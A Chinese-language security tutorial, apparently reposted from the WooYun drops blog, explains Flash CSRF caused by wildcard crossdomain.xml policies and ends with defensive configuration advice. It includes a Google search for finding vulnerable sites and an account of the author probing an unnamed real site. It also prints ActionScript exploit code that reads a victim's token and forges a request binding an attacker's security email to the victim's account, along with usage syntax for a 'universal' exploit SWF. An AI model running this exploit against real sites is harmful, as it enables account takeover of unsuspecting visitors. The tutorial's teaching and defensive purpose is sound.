- A+
http://drops.wooyun.org/tips/688
目录
0x00 Flash CSRF 名词解释
0x01 Flash CSRF形成的原因
0x02 Flash CSRF可以干些什么
0x03 Flash CSRF如何利用
0x04 Flash CSRF怎么防御
0x00 Flash CSRF名词解释
CSRF(Cross-site request forgery跨站请求伪造,是一种对网站的恶意利用,CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。
Flash CSRF通常是由于Crossdomain.xml文件配置不当造成的,利用方法是使用swf来发起跨站请求伪造。
0x01 Flash CSRF形成的原因
So 官腔我们也打了,还是要干点实事PS::)
为人民服务的好孩子,我们来看看如何寻找Flash CSRF:
首先我们要知道怎么形成CSRF的
PS:CSRF形成的原因大概有以下几种:
Flash跨域权限管理文件设置为允许所有主机/域名跨域对本站进行读写数据:
#!xml
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
Flash跨域权限管理文件过滤规则不严(domain=”*”),导致可以从其它任何域传Flash产生CSRF。
0x02 如何来发现哪些地方存在Flash CSRF
骚年们,前面我们介绍了形成Flash CSRF的原因,我们是不是就可以对站下药了,难道又有一波个人资料被莫名被修改成“狗皮膏药”广告的节奏啊,敬告各位看官,看见了这篇文章之后请检查自己的站是否存在Flash CSRF以免减少被举报而带来的巨额损失啊(吊丝们对各位看官望尘莫及啊):
由上面我们得知Flash CSRF是因为跨域权限管理文件配置不当而产生的,所以我们可以在根目录打开Crossdomain.xml来查看该网站或者只域名是否存在FLAH的CSRF:
http://www.xxx.com/crossdomain.xml
#!xml
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
0x02 Flash CSRF可以干些什么
在一个月黑风高的夜晚,Flash CSRF慢慢的在向XX网靠近,下面说说我是怎么找到XX网的Flash CSRF和利用XX网的Flash CSRF直接修改访问者账号信息。
无聊的逛着各大新闻网站,感觉这些大部分新闻网站的新闻源都差不多没几下就看完了,最后觉得自己作为天朝一员还是应该关系关系下国家大事,就懵懂懂的打开了XX网,关心了下我国基本国情,始终耐不住寂寞,正好前两天学习了Flash CSRF的原理和危害,但是一直没找到东西练手,大家都知道天朝的网站是多么的牛B,但是也只是抱着试试的心态,完全就是小孩子玩玩泥巴而已了,玩笑时间到,回到正题:),我先打开xx网,按照刚刚前面查找该网站是否有Flash CSRF漏洞我们第一步该判断什么?没错就是看官们看到的这样,我也只是个凡人而已。。。。于是就有了如下的FlashCSRF漏洞查找流程:
Google hack:crossdomain filetype:xml
#!xml
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<cross-domain-policy>
<allow-access-from domain="*" secure=”true”/>
</cross-domain-policy>
Secure=true的意思是只允许通过安全链接来请求本域的数据。
随手查看了发现前2个全都是需要用ssl证书加密了之后的网站里面的Flash的文件才能获取本域的内容,突然之间脑海就浮现了一种奇怪的想法,自己搭建SSL网站,然后调用Flash文件进去不就可以读他们网站的数据和发送post请求,可是又遇见瓶颈了,找了这么多地方我Flash还没有地方可以插的,在不屑努力下,找到BLOG根目录下面的CrossDomain.xml文件居然允许所有主机的Flash读取本域的数据-PS:),下面我们就试试BLOG页面,发现也有,当然耐心也是必须的。
0x03 Flash CSRF如何利用
我们找一个可以插入Flash的地方,插入我们自己写的Flash,访客访问我们网页就会执行我们写的脚本,下面我们来看看Flash CSRF具体利用方法。
So~下面我们来制造一个访客访问我们链接的时候,自动设置自己的密保邮箱:
首先我们添加保密邮箱点提交,然后抓包分析它提交了什么内容,然后来构造我们的Flash CSRF利用代码,下面我们提交绑定保密邮箱请求,抓包分析它的数据。
申请保密邮箱,浏览器向服务端发送了一个POST请求,请求地址和参数为:
POST:xxx.xxx.xx/xx.jsp?userid=xxxx&[email protected]
[email protected]ferer,但是页面验证了Token,所以我们就可以直接把POST数据包中的请求地址,参数名,参数值,Token值取出来用于伪造绑定保密邮箱的请求。
利用代码:
#!as3
package {
import flash.display.Sprite;
import flash.events.Event;
import flash.net.*;
import flash.text.TextField;
public class url extends Sprite
{
public function url()
{
//获取当前页面userid/token
var echo_txt:TextField = new TextField();
var targetURL:String = "http://xx.xx.cc";
var request:URLRequest = new URLRequest(targetURL);
request.method = URLRequestMethod.GET;
request.data = "";
sendToURL(request);
var loader:URLLoader=new URLLoader();
loader.addEventListener(Event.COMPLETE,completeHandler);
function completeHandler(event:Event):void{
var userid:String=((loader.data+"").match(/\/xxxx\/mxxxx\.php\?xxid=(\d+)/)||["",""])[1];
var masthash:String=((loader.data+"").match(/\/xxxx\/mxxxx\.php\?masthash=(\d+)/)||["",""])[1];
echo_txt.text = masthash;
//伪造申请密保邮箱POST请求
var emailtargetURL:String = "http://xxxxxx.xx.cc/xxxx/xxxx.jsp?mark=send";
var emailrequest:URLRequest = new URLRequest(emailtargetURL);
emailrequest.method = URLRequestMethod.POST;
var postdata:Object = new Array();
postdata[0]="[email protected]&xxxx="+xxxxx&"xxxxx="+xxx;
emailrequest.data = postdata[0];
sendToURL(emailrequest);
}
loader.load(request);
}
}
}
我们用一个新账号来做测试看看效果 :)
0x04 Flash CSRF怎么防御
知道Flash CSRF攻击流程,然后在防御就so easy了~:)
妈妈再也不担心我被Flash CSRF啦~虽然各位看官都明白了怎么防御,但是还是照例啰嗦一下啦:
一句话概括:站点根目录CrossDomain.xml跨域获取信息权限控制好,精确到子域,不给不法分子留下机会!!
附一份自己网站的CrossDomain.xml文件权限配置:
#!xml
<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="http://xx.xx.com" secure="true”/>
<allow-access-from domain="http://cc.xx.com" secure="true”/>
</cross-domain-policy>
根据自己的业务需求来更改CrossDomain.xml文件配置,切记精确到子域,这样会大大减少Flash CSRF的风险!
通用Flash CSRF EXP : FlashCSRFexp.swf
使用方法:
FlashCSRFexp.swf?url=http://www.xx.xx/x.jsp?&xx=xx&xx=xx&xx=xx&xx=xx
PS:url=[post请求的地址]&[参数值用&分开]
谢谢各位大牛捧场,十分感谢二哥,长短短,PKAV团队的技术栽培 :)~
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫